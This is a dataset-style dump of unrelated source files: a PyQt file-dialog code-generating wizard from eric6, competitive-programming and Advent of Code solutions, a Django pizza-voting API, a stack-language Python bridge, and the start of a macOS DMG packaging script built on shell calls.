self.rSaveFileUrl.toggled[bool].connect(self.__toggleConfirmCheckBox)\n self.rDirectory.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.rDirectoryUrl.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cStartWith.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cWorkDir.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cFilters.toggled[bool].connect(self.__toggleGroupsAndTest)\n \n self.bTest = self.buttonBox.addButton(\n self.tr(\"Test\"), QDialogButtonBox.ButtonRole.ActionRole)\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())\n \n def __adjustOptions(self, options):\n \"\"\"\n Private method to adjust the file dialog options.\n \n @param options file dialog options (QFileDialog.Options)\n @return modified options (QFileDialog.Options)\n \"\"\"\n if Globals.isLinuxPlatform():\n options |= QFileDialog.Option.DontUseNativeDialog\n return options\n \n @pyqtSlot(int)\n def on_pyqtComboBox_currentIndexChanged(self, index):\n \"\"\"\n Private slot to setup the dialog for the selected PyQt variant.\n \n @param index index of the current item\n @type int\n \"\"\"\n txt = self.pyqtComboBox.itemText(index)\n self.rfOpenFile.setEnabled(txt == \"eric\")\n self.rfOpenFiles.setEnabled(txt == \"eric\")\n self.rfSaveFile.setEnabled(txt == \"eric\")\n \n self.rOpenFileUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rOpenFileUrls.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rSaveFileUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rDirectoryUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n \n if txt in [\"PyQt5\", \"PyQt6\"]:\n if self.rfOpenFile.isChecked():\n self.rOpenFile.setChecked(True)\n elif self.rfOpenFiles.isChecked():\n self.rOpenFiles.setChecked(True)\n elif self.rfSaveFile.isChecked():\n self.rSaveFile.setChecked(True)\n else:\n if self.rOpenFileUrl.isChecked():\n self.rOpenFile.setChecked(True)\n if self.rOpenFileUrls.isChecked():\n self.rOpenFiles.setChecked(True)\n if self.rSaveFileUrl.isChecked():\n self.rSaveFile.setChecked(True)\n if self.rDirectoryUrl.isChecked():\n self.rDirectory.setChecked(True)\n \n if txt == \"eric\":\n self.__dialogVariant = -1\n elif txt == \"PyQt5\":\n self.__dialogVariant = 5\n elif txt == \"PyQt6\":\n self.__dialogVariant = 6\n else:\n # default is PyQt5\n self.__dialogVariant = 5\n \n self.__toggleInitialFilterAndResult(\n self.__typeButtonsGroup.checkedId())\n \n def on_buttonBox_clicked(self, button):\n \"\"\"\n Private slot called by a button of the button box clicked.\n \n @param button button that was clicked (QAbstractButton)\n \"\"\"\n if button == self.bTest:\n self.on_bTest_clicked()\n \n @pyqtSlot()\n def on_bTest_clicked(self):\n \"\"\"\n Private method to test the selected options.\n \"\"\"\n if self.rOpenFile.isChecked() or self.rfOpenFile.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getOpenFileName(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rOpenFileUrl.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getOpenFileUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getOpenFileUrl(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rOpenFiles.isChecked() or self.rfOpenFiles.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getOpenFileNames(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rOpenFileUrls.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getOpenFileUrls(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getOpenFileUrls(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rSaveFile.isChecked() or self.rfSaveFile.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getSaveFileName(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rSaveFileUrl.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getSaveFileUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getSaveFileUrl(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rDirectory.isChecked():\n options = QFileDialog.Options()\n if not self.cSymlinks.isChecked():\n options |= QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n if self.cDirOnly.isChecked():\n options |= QFileDialog.Options(QFileDialog.Option.ShowDirsOnly)\n else:\n options |= QFileDialog.Options(QFileDialog.Option(0))\n options = self.__adjustOptions(options)\n QFileDialog.getExistingDirectory(\n None,\n self.eCaption.text(),\n self.eWorkDir.text(),\n options)\n elif self.rDirectoryUrl.isChecked():\n options = QFileDialog.Options()\n if not self.cSymlinks.isChecked():\n options |= QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n if self.cDirOnly.isChecked():\n options |= QFileDialog.Options(QFileDialog.Option.ShowDirsOnly)\n else:\n options |= QFileDialog.Options(QFileDialog.Option(0))\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getExistingDirectoryUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eWorkDir.text()),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getExistingDirectoryUrl(\n None,\n self.eCaption.text(),\n self.eWorkDir.text(),\n options,\n self.schemesEdit.text().split())\n \n def __toggleConfirmCheckBox(self):\n \"\"\"\n Private slot to enable/disable the confirmation check box.\n \"\"\"\n self.cConfirmOverwrite.setEnabled(\n self.rSaveFile.isChecked() or self.rfSaveFile.isChecked() or\n self.rSaveFileUrl.isChecked())\n \n def __toggleGroupsAndTest(self):\n \"\"\"\n Private slot to enable/disable certain groups and the test button.\n \"\"\"\n if self.rDirectory.isChecked() or self.rDirectoryUrl.isChecked():\n self.filePropertiesGroup.setEnabled(False)\n self.dirPropertiesGroup.setEnabled(True)\n self.bTest.setDisabled(self.cWorkDir.isChecked())\n else:\n self.filePropertiesGroup.setEnabled(True)\n self.dirPropertiesGroup.setEnabled(False)\n self.bTest.setDisabled(\n self.cStartWith.isChecked() or self.cFilters.isChecked())\n \n def __toggleInitialFilterAndResult(self, checkedId):\n \"\"\"\n Private slot to enable/disable the initial filter elements and the\n results entries.\n \n @param checkedId id of the clicked button (integer)\n \"\"\"\n enable = (\n (self.__dialogVariant in (-1, ) and checkedId in [11, 12, 13]) or\n (self.__dialogVariant in (5, 6) and\n checkedId in [1, 2, 3, 21, 22, 23])\n )\n \n self.lInitialFilter.setEnabled(enable)\n self.eInitialFilter.setEnabled(enable)\n self.cInitialFilter.setEnabled(enable)\n \n self.lFilterVariable.setEnabled(enable)\n self.eFilterVariable.setEnabled(enable)\n \n self.urlPropertiesGroup.setEnabled(checkedId in (21, 22, 23, 31))\n \n def getCode(self, indLevel, indString):\n \"\"\"\n Public method to get the source code for Qt5.\n \n @param indLevel indentation level (int)\n @param indString string used for indentation (space or tab) (string)\n @return generated code (string)\n \"\"\"\n # calculate our indentation level and the indentation string\n il = indLevel + 1\n istring = il * indString\n estring = os.linesep + indLevel * indString\n \n # now generate the code\n if self.parentSelf.isChecked():\n parent = \"self\"\n elif self.parentNone.isChecked():\n parent = \"None\"\n elif self.parentOther.isChecked():\n parent = self.parentEdit.text()\n if parent == \"\":\n parent = \"None\"\n \n # prepare the result variables\n nameVariable = self.eNameVariable.text()\n if not nameVariable:\n if self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFile, self.rfOpenFile,\n self.rSaveFile, self.rfSaveFile]:\n nameVariable = \"fileName\"\n elif self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFiles, self.rfOpenFiles]:\n nameVariable = \"fileNames\"\n elif self.__typeButtonsGroup.checkedButton() == self.rDirectory:\n nameVariable = \"dirName\"\n else:\n nameVariable = \"res\"\n filterVariable = self.eFilterVariable.text()\n if not filterVariable:\n if (\n (self.__dialogVariant in (-1, ) and\n self.__typeButtonsGroup.checkedButton() in [\n self.rfOpenFile, self.rfOpenFiles, self.rfSaveFile]) or\n (self.__dialogVariant in (5, 6) and\n self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFile, self.rOpenFiles, self.rSaveFile])\n ):\n filterVariable = \", selectedFilter\"\n else:\n filterVariable = \"\"\n else:\n filterVariable = \", \" + filterVariable\n \n if self.__dialogVariant == -1:\n dialogType = \"E5FileDialog\"\n optionStr = \"\"\n else:\n dialogType = \"QFileDialog\"\n optionStr = \".Option\"\n \n code = '{0}{1} = {2}.'.format(nameVariable, filterVariable, dialogType)\n if (\n self.rOpenFile.isChecked() or\n self.rfOpenFile.isChecked() or\n self.rOpenFileUrl.isChecked()\n ):\n if self.rOpenFile.isChecked():\n code += 'getOpenFileName({0}{1}'.format(os.linesep, istring)\n elif self.rOpenFileUrl.isChecked():\n code += 'getOpenFileUrl({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getOpenFileNameAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rOpenFileUrl.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if self.eFilters.text() == \"\":\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfOpenFile.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if not self.cSymlinks.isChecked():\n code += (\n ',{0}{1}{2}.Options({2}{3}.DontResolveSymlinks)'\n .format(os.linesep, istring, dialogType, optionStr)\n )\n if self.rOpenFileUrl.isChecked() and bool(self.schemesEdit.text()):\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n elif (\n self.rOpenFiles.isChecked() or\n self.rfOpenFiles.isChecked() or\n self.rOpenFileUrls.isChecked()\n ):\n if self.rOpenFiles.isChecked():\n code += 'getOpenFileNames({0}{1}'.format(os.linesep, istring)\n elif self.rOpenFileUrls.isChecked():\n code += 'getOpenFileUrls({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getOpenFileNamesAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rOpenFileUrls.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if not self.eFilters.text():\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfOpenFiles.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if not self.cSymlinks.isChecked():\n code += (\n ',{0}{1}{2}.Options({2}{3}.DontResolveSymlinks)'\n .format(os.linesep, istring, dialogType, optionStr)\n )\n if (\n self.rOpenFileUrls.isChecked() and\n bool(self.schemesEdit.text())\n ):\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n elif (\n self.rSaveFile.isChecked() or\n self.rfSaveFile.isChecked() or\n self.rSaveFileUrl.isChecked()\n ):\n if self.rSaveFile.isChecked():\n code += 'getSaveFileName({0}{1}'.format(os.linesep, istring)\n elif self.rSaveFileUrl.isChecked():\n code += 'getSaveFileUrl({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getSaveFileNameAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rSaveFileUrl.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if not self.eFilters.text():\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfSaveFile.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if (\n (not self.cSymlinks.isChecked()) or\n (not self.cConfirmOverwrite.isChecked())\n ):\n code += ',{0}{1}{2}.Options('.format(\n os.linesep, istring, dialogType)\n if not self.cSymlinks.isChecked():\n code += '{0}{1}.DontResolveSymlinks'.format(\n dialogType, optionStr)\n if (\n (not self.cSymlinks.isChecked()) and\n (not self.cConfirmOverwrite.isChecked())\n ):\n code += ' | '\n if not self.cConfirmOverwrite.isChecked():\n code += '{0}{1}.DontConfirmOverwrite'.format(\n dialogType, optionStr)\n code += ')'\n if (\n self.rSaveFileUrl.isChecked() and\n bool(self.schemesEdit.text())\n ):\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n \n code += '){0}'.format(estring)\n elif self.rDirectory.isChecked() or self.rDirectoryUrl.isChecked():\n if self.rDirectory.isChecked():\n code += 'getExistingDirectory({0}{1}'.format(\n os.linesep, istring)\n else:\n code += 'getExistingDirectoryUrl({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rDirectoryUrl.isChecked():\n if not self.eWorkDir.text():\n code += 'QUrl()'\n else:\n if self.cWorkDir.isChecked():\n fmt = '{0}'\n else:\n fmt = 'QUrl(\"{0}\")'\n code += fmt.format(self.eWorkDir.text())\n else:\n if not self.eWorkDir.text():\n code += '\"\"'\n else:\n if self.cWorkDir.isChecked():\n fmt = '{0}'\n else:\n fmt = '\"{0}\"'\n code += fmt.format(self.eWorkDir.text())\n code += ',{0}{1}{2}.Options('.format(os.linesep, istring,\n dialogType)\n if not self.cSymlinks.isChecked():\n code += '{0}{1}.DontResolveSymlinks | '.format(\n dialogType, optionStr)\n if self.cDirOnly.isChecked():\n code += '{0}{1}.ShowDirsOnly'.format(\n dialogType, optionStr)\n else:\n code += '{0}.Option(0)'.format(dialogType)\n code += ')'\n if self.rDirectoryUrl.isChecked():\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n \n return code\n \n def __prepareSchemesList(self):\n \"\"\"\n Private method to prepare the list of supported schemes.\n \n @return string representation of the supported schemes\n @rtype str\n \"\"\"\n return repr(self.schemesEdit.text().strip().split())\n","repo_name":"sharkblue-LS/PythonProjects","sub_path":"eric6/eric/eric6/Plugins/WizardPlugins/FileDialogWizard/FileDialogWizardDialog.py","file_name":"FileDialogWizardDialog.py","file_ext":"py","file_size_in_byte":29335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"25413676599","text":"# https://atcoder.jp/contests/abc038/tasks/abc038_d\n# \n# \n# wで昇順で並べる.並び替えた列の,hのLONGEST INCREASING SEQUENCEを求める.\n# - wが等しい2要素を除去できず\n# - LISを求める方法\n# で詰まって,以下のページをカンニングしてしまう.\n# https://soohprogramming.wordpress.com/2020/11/13/abc038-d-%E3%83%97%E3%83%AC%E3%82%BC%E3%83%B3%E3%83%88/\n# \n# 前者は,wの後にhを降順に並べると,同一のwから選択される要素は一つにできる.\n# 後者は,蟻本のP.64を見ました.蟻本一版のdp[j] は,dp[j+1]の誤植?\n\nN = int(input())\nWH = []\nfor _ in range(N):\n w,h = map(int, input().split())\n WH.append((w,h))\n\nWH.sort(key=lambda ele: (ele[0], -ele[1]))\n\nHs = [ele[1] for ele in WH]\n\n# print(WHs)\n\ndef LIS(arr):\n dp = [0] * (len(arr)+1)\n for index,a in enumerate(arr):\n dp[index+1] = 1\n # print(\"index, a\", index, a, dp)\n for j in range(index):\n # print(index, j, dp, arr[j], a)\n if arr[j] < a:\n dp[index+1] = max(dp[index+1], dp[j+1]+1)\n return dp\n\nprint(LIS(Hs)[-1])","repo_name":"mamemilk/acrc","sub_path":"プログラミングコンテストチャレンジブック_秋葉,他/src/2-2-2_04_abc038_d__WA__.py","file_name":"2-2-2_04_abc038_d__WA__.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40921246664","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import permissions\n\nimport json\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom .permissions import ReadOnly\n\nfrom .models import Pizza, Vote, ToppingsInPizza, Topping\n\n\n@api_view(['GET'])\n@permission_classes((ReadOnly,))\ndef get_res_of_voting(request):\n res_of_voting = {}\n for pizza in Pizza.objects.all():\n res_of_voting[pizza.name] = 0\n for vote in Vote.objects.all():\n res_of_voting[vote.pizza.name] += 1\n return HttpResponse(json.dumps(res_of_voting))\n\n\n@api_view(['POST'])\n@permission_classes((permissions.IsAuthenticated,))\ndef post_vote(request):\n try:\n id_pizza = int(request.data['id_pizza'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n if Pizza.objects.filter(pk=id_pizza).exists() and Vote.objects.filter(author_id=request.user.id).exists():\n Vote(pizza_id=id_pizza, author_id=request.user.id).save()\n if Pizza.filter(pk=id_pizza):\n Vote(author=request.user, pizza_id=id_pizza).save()\n return HttpResponse(json.dumps({'status': 'Correct data types'}))\n\n\n@api_view(['GET'])\ndef amount_of_toppings(request):\n amount_top = {}\n for pizza in Pizza.objects.all():\n amount_top[pizza.name] = 0\n for topping in ToppingsInPizza.objects.all():\n amount_top[topping.pizza.name] += 1\n return HttpResponse(json.dumps(amount_top))\n\n\n@api_view(['POST'])\ndef add_toppings_in_pizza(request):\n try:\n id_pizza = int(request.data['id_pizza'])\n id_topping = int(request.data['id_topping'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n\n if Pizza.objects.filter(pk=id_pizza) and Topping.objects.filter(pk=id_topping):\n if Pizza.objects.get(id=id_pizza).author.id.__eq__(request.user.id):\n ToppingsInPizza(pizza_id=id_pizza, topping_id=id_topping).save()\n return HttpResponse(json.dumps({'status': 'Save if not existed'}))\n return HttpResponse(json.dumps({'status': 'Not existed pizza or topping id or not pizza author'}))\n\n\n@api_view(['POST'])\ndef add_pizza(request):\n try:\n pizza_name = str(request.data['pizza_name'])\n pizza_price = int(request.data['pizza_price'])\n except:\n return HttpResponse(json.dumps({'status': 'Incorrect data type'}))\n Pizza(name=pizza_name, price=pizza_price, author=request.user).save()\n return HttpResponse(json.dumps({'status': 'Correct data type'}))\n","repo_name":"amsuredev/pizza","sub_path":"api/views_functions.py","file_name":"views_functions.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14592107699","text":"import itertools\n\nimport day09.data as data\n\n\ndef part1():\n value = data.INPUT\n\n for idx in range(25, len(value)):\n pre_25 = value[idx - 25 : idx]\n sums = [sum(pair) for pair in itertools.permutations(pre_25, 2)]\n\n current = value[idx]\n\n if current not in sums:\n return current\n\n return 0\n\n\ndef part2():\n value = data.INPUT\n\n target = 29221323\n for start_idx in range(len(value)):\n for item_count in range(2, len(value) - start_idx):\n items = []\n for idx in range(item_count):\n items.append(value[start_idx + idx])\n\n total = sum(items)\n if total == target:\n return min(items) + max(items)\n\n if total > target:\n break\n\n return 0\n","repo_name":"ogun/advent-of-code-2020","sub_path":"day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"16614194155","text":"import importlib\nimport inspect\nimport types\n\n\ndef import_from_python(interpeter, stack, scopes, stream):\n val = stack.pop()\n mod = importlib.import_module(val.VAL)\n tok = interpeter.Token(TYPE=\"py-obj\", VAL=mod)\n stack.append(tok)\n\n\ndef py_call(interpeter, stack, scopes, stream):\n val2, val = stack.pop(), stack.pop()\n\n if not val.TYPE == \"py-obj\":\n interpeter.report_error(\n \"TYPE\",\n \"py_call\",\n \"%s is not a py-obj!\" % val)\n if not isinstance(val.VAL, types.FunctionType):\n interpeter.report_error(\n \"TYPE\",\n \"py_call\",\n \"%s.VAL is not a Python function!\")\n\n f = val.VAL\n\n spec = inspect.getargspec(f)\n\n defaults = zip(reversed(spec.args), reversed(spec.defaults))\n kwargs = dict(defaults)\n\n args = []\n for arg in val2.VAL:\n args.append(arg)\n\n # print(\"KW-ARGS:\", kwargs)\n # print(\"ARGS:\", args)\n # print(\"FUNC:\", f)\n\n res = f(*args, **kwargs)\n\n # print(\"RES:\", repr(res))\n\n tok = interpeter.Token(TYPE=\"py-obj\", VAL=res)\n stack.append(tok)\n\n\nmodule = {\n \"import_from_python\": import_from_python,\n \"py_call\": py_call\n}\n","repo_name":"StackLanguge/stack-language","sub_path":"lib/import_from_python.py","file_name":"import_from_python.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"38770688673","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@Time : 2023/04/01 16:56:04\n@File : settingPage.py\n@Software: VSCode\n@Author : PPPPAN \n@Version : 0.7.66\n@Contact : for_freedom_x64@live.com\n'''\n\nimport sys, os, platform, subprocess, time\n\nif __name__ == '__main__':\n if platform.system() == 'Darwin':\n print('当前系统为:MacOS')\n flag = input('make为程序包app 输入1 ,make为dmg发布 输入2 :\\n')\n if flag == '1':\n print('......开始make程序为app......')\n os.system('rm -rf build/Ashore.MacOS.file')\n os.system('rm -rf dist/Ashore.MacOS.file')\n os.system('pyinstaller bale/Ashore.MacOS.file.spec')\n os.system('cp bale/Info.plist dist/Ashore.app/Contents/')\n os.system('mkdir dist/Ashore.MacOS.file')\n os.system('mkdir dist/Ashore.MacOS.file/Ashore')\n os.system('mv dist/Ashore.app dist/Ashore.MacOS.file/Ashore')\n os.system('mv dist/Ashore dist/Ashore.MacOS.file/Ashore')\n print('Ashore.app 打包完毕')\n cmd = 'open dist/Ashore.MacOS.file/Ashore/Ashore.app --reveal'\n subprocess.Popen([cmd],shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n elif flag == '2':\n print('......开始make程序为dmg......')\n os.system('rm -rf build/Ashore.MacOS.dmg')\n os.system('rm -rf dist/Ashore.MacOS.dmg')\n os.system('defaults write com.apple.finder AppleShowAllFiles YES')\n os.system('killall Finder')\n os.system('pyinstaller bale/Ashore.MacOS.file.spec')\n os.system('cp bale/Info.plist dist/Ashore.app/Contents/')\n os.system('mkdir dist/Ashore.MacOS.dmg')\n os.system('mkdir dist/Ashore.MacOS.dmg/temp')\n os.system('mv dist/Ashore.app dist/Ashore.MacOS.dmg/temp')\n os.system('cp static/icon/icon.funtion/icon.icns dist/Ashore.MacOS.dmg')\n os.system('cp bale/dmg.png dist/Ashore.MacOS.dmg/temp/.background.png')\n os.system('rm dist/Ashore')\n os.chdir('dist/Ashore.MacOS.dmg') \n os.system('ln -s /Applications temp')\n #使用temp文件夹制作dmg文件\n os.system('hdiutil create -srcfolder \"temp\" -size 50M -format UDRW -volname \"Ashore Installer\" \"temp/Ashore.temp.dmg\"')\n print('Created DMG: Ashore.temp.dmg')\n time.sleep(1)\n os.system('hdiutil attach \"temp/Ashore.temp.dmg\"')\n time.sleep(1)\n # 使用applescript设置一系列的窗口属性\n applescript = '''\n echo '\n tell application \"Finder\"\n tell disk \"Ashore Installer\"\n open\n set current view of container window to icon view\n set toolbar visible of container window to false\n set statusbar visible of container window to false\n set the bounds of container window to {300, 200, 1000, 660}\n set viewOptions to the icon view options of container window\n set arrangement of viewOptions to not arranged\n set icon size of viewOptions to 128\n set background picture of viewOptions to file \".background.png\"\n set position of item \"Ashore.app\" of container window to {130, 120}\n set position of item \"Applications\" of container window to {390, 120}\n set position of item \".background.png\" of container window to {0, 0}\n close\n open\n update without registering applications\n delay 2\n end tell\n end tell\n ' | osascript\n '''\n os.system(applescript)\n time.sleep(2)\n os.system('sync')\n # 设置映像图标\n os.system('cp icon.icns \"/Volumes/Ashore Installer/.VolumeIcon.icns\"')\n os.system('SetFile -c icnC \"/Volumes/Ashore Installer/.VolumeIcon.icns\"')\n os.system('SetFile -a C \"/Volumes/Ashore Installer\"')\n # 卸载\n time.sleep(5)\n os.system('hdiutil detach \"/Volumes/Ashore Installer\"')\n time.sleep(5)\n # 压缩映像并设置为只读\n print('Creating compressed image')\n os.system('hdiutil convert \"temp/Ashore.temp.dmg\" -format UDZO -imagekey zlib-level=9 -o \"Ashore.dmg\"')\n # 清除临时文件\n os.system('rm -r temp')\n os.system('rm icon.icns')\n os.system('defaults write com.apple.finder AppleShowAllFiles NO')\n os.system('killall Finder')\n print('Ashore.dmg 打包完毕')\n os.system('open Ashore.dmg --reveal')\n else:\n print('error')\n elif platform.system() == 'Linux':\n print('当前系统为:Linux')\n flag = input('make为单文件 输入1 ,make为文件夹 输入2 :\\n')\n if flag == '1':\n print('......开始make为 单文件 